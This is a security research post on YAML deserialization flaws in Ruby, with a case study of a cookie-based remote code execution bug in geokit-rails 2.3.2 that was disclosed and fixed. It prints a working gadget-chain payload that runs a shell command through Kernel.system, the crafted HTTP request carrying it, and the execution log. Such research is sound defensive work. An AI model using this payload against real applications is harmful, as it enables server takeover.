Finding YAML Deserialization with Snyk Code

Written by
Calum Hutton

February 23, 2023

I conducted some research to identify YAML injection issues in open-source projects using Snyk Code. Although the vulnerability class is not new, its potential impact is high, which made it a good candidate for research. This research led to the discovery of several issues in open-source projects written in Python, PHP, and Ruby. This article focuses on the issue found in geokit-rails version 2.3.2, a plugin for Ruby on Rails.

YAML

YAML is more than a mere data interchange format like JSON. The specification describes a number of advanced features that make it ripe for security investigation, such as:

  • Custom tags (e.g. in PyYAML)

  • Anchors and aliases

  • Merged attributes

  • Multiple-document streams
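To make a few of these features concrete, here is a minimal sketch in Ruby, assuming Ruby 2.6 or later (for the aliases: keyword of YAML.safe_load). The document contents and key names are invented for illustration.

```ruby
require 'yaml'

# An anchor (&defaults) names a node; an alias (*defaults) reuses it.
# The merge key (<<) copies the aliased mapping into the current one.
doc = <<~YAML
  defaults: &defaults
    adapter: postgres
    pool: 5
  production:
    <<: *defaults
    pool: 20
YAML

# safe_load rejects aliases unless they are explicitly enabled.
config = YAML.safe_load(doc, aliases: true)
puts config['production'].inspect

# A single stream can carry several documents separated by '---'.
stream = "---\nname: first\n---\nname: second\n"
docs = YAML.load_stream(stream)
puts docs.length
```

The production mapping inherits adapter from the anchored mapping and overrides pool, while load_stream returns one Ruby object per document in the stream.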

YAML can also be used to serialize binary data and arbitrary objects in various languages, potentially leading to deserialization vulnerabilities. These vulnerabilities are the target of this research, since successful exploitation often leads to Remote Code Execution (RCE).

YAML deserialization in Ruby

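In Ruby, YAML parsing ships with the standard library (the Psych parser, loaded with require 'yaml'), so no additional gems are needed. An application that uses this built-in parser is vulnerable to deserialization attacks if it passes untrusted input to YAML.load() or YAML.load_file() instead of YAML.safe_load() or YAML.safe_load_file(), respectively. Note that from Psych 4 (bundled with Ruby 3.1), YAML.load() is safe by default and the unsafe behavior is available as YAML.unsafe_load(); this article describes the earlier, unsafe default. An alternative, safe-by-default YAML parser is available in the SafeYAML project.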

The following script and output demonstrate an unsafe way to load YAML with YAML.load().

require 'yaml'

var = {
 id: 1,
 desc: 'A simple hash'
}

yaml = '---
:id: 1
:desc: A simple hash'

puts var
puts YAML.load(yaml)

# Prints:

{:id=>1, :desc=>"A simple hash"}
{:id=>1, :desc=>"A simple hash"}

The var variable holds a simple Ruby hash, and the yaml variable contains the equivalent hash serialized in YAML form. Both puts statements display the same hash, because the yaml variable has been deserialized from a YAML string back into a hash via YAML.load(). More complex objects can also be serialized and deserialized in this way.

During the initial stages of this research, I came across a universal Ruby YAML deserialization gadget, effective on Ruby versions 2.x to 3.x, which triggers arbitrary command execution when deserialized.

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: id
         method_id: :resolve

The above YAML payload will execute the id command upon deserialization if it is parsed via YAML.load() or YAML.load_file().
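By contrast, YAML.safe_load() refuses to instantiate tagged Ruby objects at all. The sketch below uses a harmless single-object document as a stand-in for attacker input; parse_untrusted is a hypothetical helper name, and returning nil on rejection is only one possible policy.

```ruby
require 'yaml'

# A harmless stand-in for attacker input: a single tagged Ruby object.
untrusted = "--- !ruby/object:Gem::Requirement\nrequirements: []\n"

# Hypothetical helper: parse with safe_load and treat rejected input as nil.
def parse_untrusted(yaml)
  YAML.safe_load(yaml)
rescue Psych::DisallowedClass, Psych::BadAlias => e
  warn "Rejected YAML: #{e.message}"
  nil
end

result = parse_untrusted(untrusted)                      # tagged object is rejected
plain  = parse_untrusted("---\nlat: 51.5\nlng: -0.12\n") # plain data still parses
```

Because safe_load only builds basic types (strings, numbers, arrays, hashes and similar) unless classes are explicitly permitted, the object tags that the gadget chain depends on are never resolved.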

Case study: geokit-rails (2.3.2)

The geokit-rails gem is a plugin for Ruby on Rails that provides location services for the application. The plugin uses the unsafe YAML.load() method via the retrieve_location_from_cookie_or_service() method in geokit-rails/ip_geocode_lookup.rb:

# Uses the stored location value from the cookie if it exists.  If
# no cookie exists, calls out to the web service to get the location.
def retrieve_location_from_cookie_or_service
 return GeoLoc.new(YAML.load(cookies[:geo_location])) if cookies[:geo_location]
 location = Geocoders::MultiGeocoder.geocode(get_ip_address)
 return location.success ? location : nil
end

The data flowing into the unsafe YAML.load() call originates from the Ruby on Rails cookies object, which holds the cookies sent with the request. This is good news for an attacker, as cookie values can be controlled directly by crafting an appropriate HTTP request.

Proof of concept

I set up a Rails application running the geokit-rails plugin (version 2.3.2) on Ruby 3.0.0. The following HTTP request was sent to the application to exploit the issue. It includes the URL-encoded YAML payload in the geo_location cookie.

GET http://127.0.0.1:3000/vulns HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Length: 0
Cookie: geo_location=---%0A-+%21ruby%2Fobject%3AGem%3A%3AInstaller%0A++++i%3A+x%0A-+%21ruby%2Fobject%3AGem%3A%3ASpecFetcher%0A++++i%3A+y%0A-+%21ruby%2Fobject%3AGem%3A%3ARequirement%0A++requirements%3A%0A++++%21ruby%2Fobject%3AGem%3A%3APackage%3A%3ATarReader%0A++++io%3A+%261+%21ruby%2Fobject%3ANet%3A%3ABufferedIO%0A++++++io%3A+%261+%21ruby%2Fobject%3AGem%3A%3APackage%3A%3ATarReader%3A%3AEntry%0A+++++++++read%3A+0%0A+++++++++header%3A+%22abc%22%0A++++++debug_output%3A+%261+%21ruby%2Fobject%3ANet%3A%3AWriteAdapter%0A+++++++++socket%3A+%261+%21ruby%2Fobject%3AGem%3A%3ARequestSet%0A+++++++++++++sets%3A+%21ruby%2Fobject%3ANet%3A%3AWriteAdapter%0A+++++++++++++++++socket%3A+%21ruby%2Fmodule+%27Kernel%27%0A+++++++++++++++++method_id%3A+%3Asystem%0A+++++++++++++git_set%3A+id%0A+++++++++method_id%3A+%3Aresolve; _my_rails_app_session=%2B48ny21MkgVzlJR4LMcsdNtOK0G1aHx0%2Byoz4xLnkaMHrCner7YSRfQ04notQ0oNesQdG4EV5T%2FpyrQBSKBdKOZLLvP2J1NLOAQe1Z5zTTuu5Grcw1wuRpIHKAmZjfj3bqKqghkOj1JpOBxJoxFS7L6cH3wIsoq%2FrK%2BlAxVvP%2F8F9g5Q%2FA3pLVj2DTF3l7CcDBzOE9cPCOShesP717YbZNoa%2BPNf3mGjmKWvq26Y3CKMg2z7mAJHA%2B0CdA9l2pXsbrgwRJUW3Epqx4eJt0%2FDCJgS6Mp7rGjQeoIqLj4%3D--YAEA%2FepI0t701ifo--fVitYcX5PORz3a9xN4ev4A%3D%3D; __profilin=p%3Dt
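The geo_location value is ordinary form-style URL encoding of the YAML text: newlines become %0A, spaces become +, and characters such as : and ! are percent-encoded. As a minimal sketch of that encoding, using the harmless hash from earlier rather than the payload and assuming Ruby's standard uri library:

```ruby
require 'uri'

# Harmless YAML used only to illustrate the encoding step.
yaml = "---\n:id: 1\n:desc: A simple hash"

# Form-style encoding: space becomes '+', other reserved bytes become %XX.
encoded = URI.encode_www_form_component(yaml)
# Decoding reverses the transformation and recovers the original text.
decoded = URI.decode_www_form_component(encoded)

puts encoded
```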

Within the Rails application, the payload was deserialized and executed, running the id command to prove command execution.

Started GET "/vulns" for 127.0.0.1 at 2022-11-07 12:05:57 +0000
Processing by VulnsController#index as HTML
sh: reading: command not found 
uid=501(calumh) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae) 
Completed 500 Internal Server Error in 167ms (Allocations: 35610)

For a system using geokit-rails, an attacker exploiting this vulnerability could achieve RCE, potentially leading to total system takeover.

Remediation

This issue was responsibly disclosed to the maintainer of geokit-rails and was fixed in version 2.5.0, which stores the coordinate information in the cookie as JSON instead of YAML. As a result of this research, Snyk Code’s rules for detecting YAML injection were improved, so more of these issues should now be detectable in user projects.
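To illustrate why moving to JSON closes this hole, here is a minimal sketch of reading location data from a JSON cookie value. It is not the actual geokit-rails patch: the helper name, the constant, and the key names are hypothetical, chosen only for illustration.

```ruby
require 'json'

# Hypothetical list of keys the application expects in the cookie.
ALLOWED_KEYS = %w[lat lng city country_code].freeze

# Hypothetical helper: parse a cookie value as JSON and keep only expected keys.
# JSON.parse yields plain hashes, arrays, strings and numbers by default,
# so no arbitrary Ruby objects are instantiated.
def location_attributes_from_cookie(raw)
  return nil if raw.nil? || raw.empty?

  data = JSON.parse(raw)
  return nil unless data.is_a?(Hash)

  data.slice(*ALLOWED_KEYS)
rescue JSON::ParserError
  # Anything that is not valid JSON (including a YAML payload) is ignored.
  nil
end

attrs = location_attributes_from_cookie('{"lat":51.5,"lng":-0.12,"extra":"x"}')
```

Filtering to a known set of keys is an extra defensive choice in this sketch, so that unexpected fields in an attacker-supplied cookie are dropped before the data is used.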
